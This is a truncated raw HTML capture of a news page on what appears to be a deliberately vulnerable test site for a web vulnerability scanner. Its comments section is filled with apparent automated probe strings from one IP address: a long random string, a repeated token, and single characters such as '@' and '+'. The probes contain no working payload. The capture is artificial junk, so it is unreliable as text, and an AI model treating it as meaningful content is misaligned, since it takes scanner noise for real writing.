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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLC1ZzdDgKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBFUb3UJCVH0dzG/MtYPzVibwUk2I" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hteLUTPmLvVvWGoKVsqwffTWrynmiZJjjNNrFbJqoeGxqjDAeUEibSWZKfhBNrYPufKMhRZtpWivRWihDBNIpGmVVtZKWnVGxBNlZKlKPDseXSiBChCNjYOJKkeUomKYiPxUUjQdvqoTXhrgJERNURXvVSJHuSyCKjmFBnBSnTxQuRVWCXsrEtRrqXdiLNJYKyMeKUZiymjAyJVQacjQMmjJubhLnoNybvhmPaSJPTmBlGMxhKFxWEyRHaQCDfaINIDOOekRqJIyvXkRlNPpwRLArqrQdFnNXSQnsnNGFimrcVdkdhrvcLNawKfXGbpgTYCreZKFyKORIDAmMDNwbgUOxWHJYTcppjZcSRICfSaiLoIwcsynvUcJRvgofgZDYEtkTRsInrJOfqOGciQtehkXBtspmqhSKZBJTowumOrCqtsJBUOjGfcZleenjYOmQqPOcHYKpwJcKsqTbqjPApvTYKqhyjCBYPnsMGJbicWHWPOdcVNgQZdvHcKHIubEolYjXXVOHkAGHJcfYtVYxrmhgFcMuAKcnceHVGSYuZqHjKELJMtuCJtTelpEbKUGlrDetQTQxnhiWcQwgRRnuGbogSpbqhvqbAvgUnpXtWCoTmQwkTOgmhEXsyTsdssMiuZZiyqYoRWYNXrxOvIElbIPZxEQClRNjuYRceqvYxwcexZbILMeReTKNNXELVhpTbfdmACtUPGYkWqfRkkfABaVqYCuVKJAGGaYBFNITecslcuvgqfMpRUqXYMQGcNkwqnKqlrejOiRGJDGIXhCCWcvvBCMAyVZdnYJCorcxwYYybKfUUfukSoQcnEoxxDfJaEkkBSnJdjlwcxZCAweULTcKytxsqwVEwrSbBnEUmFFIFKxHRRJpDcraVpXiglKVtBPcAAffsHIvEfmXfEtetcNvQEfrNfhoZXNcHXJgSOYCVMdCtUKhyOeZakrcGshkesTuxfOvgRyjLkbspmmepdlNpgSjCmOdTptmxFPZXdOySQQejMVmsTWwjjwVjqDstDjgyxXJsZJCPNOSfDyiHBmoFODMODbrDBTkjqJnkHeghLkQxYvZwiaoUgsyFXoNgyEiHRMijfCYsTRXmbLdovdyfNYMxPJPhZLwyQVWIWefQMHYAOHLfZYNUXHWAiNDqHDjLSKiGymhEvFdgmYbnSLNWUObttBNBFlRdsYeYUGtjxcKRltJvkCRZhTdMcfmwvlSFStBftMYXRKThRtkqSnqYQpwWGjaUXTVnMJfFNqZBhjWAOsRHEOUOVyRPFimoNUctqMPJOqOSPqopZAZbciADxuCDqbeFoqhLytqdSFacFUalfiAaEXyLVVARjeURmQfSjvhLBvbfEjEHbvEwAySFfHbyKZWWtPVnpuGJVfbaXQdjiRyJFWKTPcwkRSiTqrywtStjaUSlBgdwFdwiCArcGLuidxZhGkyxeGPuwRdlJFbcwfcFbKkpsFhAbYrYvHHtUfdBIihAXScvutQwGYCjRKaVtoFZpYNDLKkyXlQWuQXaodXXcTdXGNgEPKEaTLSqYmnAfOmQSDaYaIuKhPXxVJiEPTCjlJfsxUULcMOEDPxxTsxNmInHvKTZxpWIwhwfYLQvSGtdcZfqKjLOAMbOjwxLToNPdkfoEqUUcKvMGkYvoknOLBSKUMqsjqOnsyhpxNecJtiXJuVjREDGbdnxhLHoAFcrsPWDBiuwwbZwDMaoPefbquLLLJAINqTAEUGQbKFiQhOQoZDVgpSudhQlohBNFBkuYFIFDBMXphNIRJdEwSYXKSLbESKoeinFqrwRZkXtFnLjxaUeUEIqyPcyLNIgOXRJZcFpSUHXABHlIdwPSYLisxTahlVjyeEaYmBuocjljZpsoOQHPuEwPcbZSuAmwGdLtdwJkWXMTuXkSkZFasVifQoRGwhuQkVlMVrCOALNMiTVZgDuovHQtGZrbbAhAYTlbgHWCjpAACoCPdoNkZPUruOIRpLQlHlZZnBrRnBrrNhgEfbGSYexxpZaECmyHDNOxnRnMdRBTchVlCBJDONoaGeLFMTSXUgVeeLPbotSJWaeXBnXpJuHceqlFGUIkOQIUVdhIYaMOWfkCRHvNx</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">@</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">+</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by 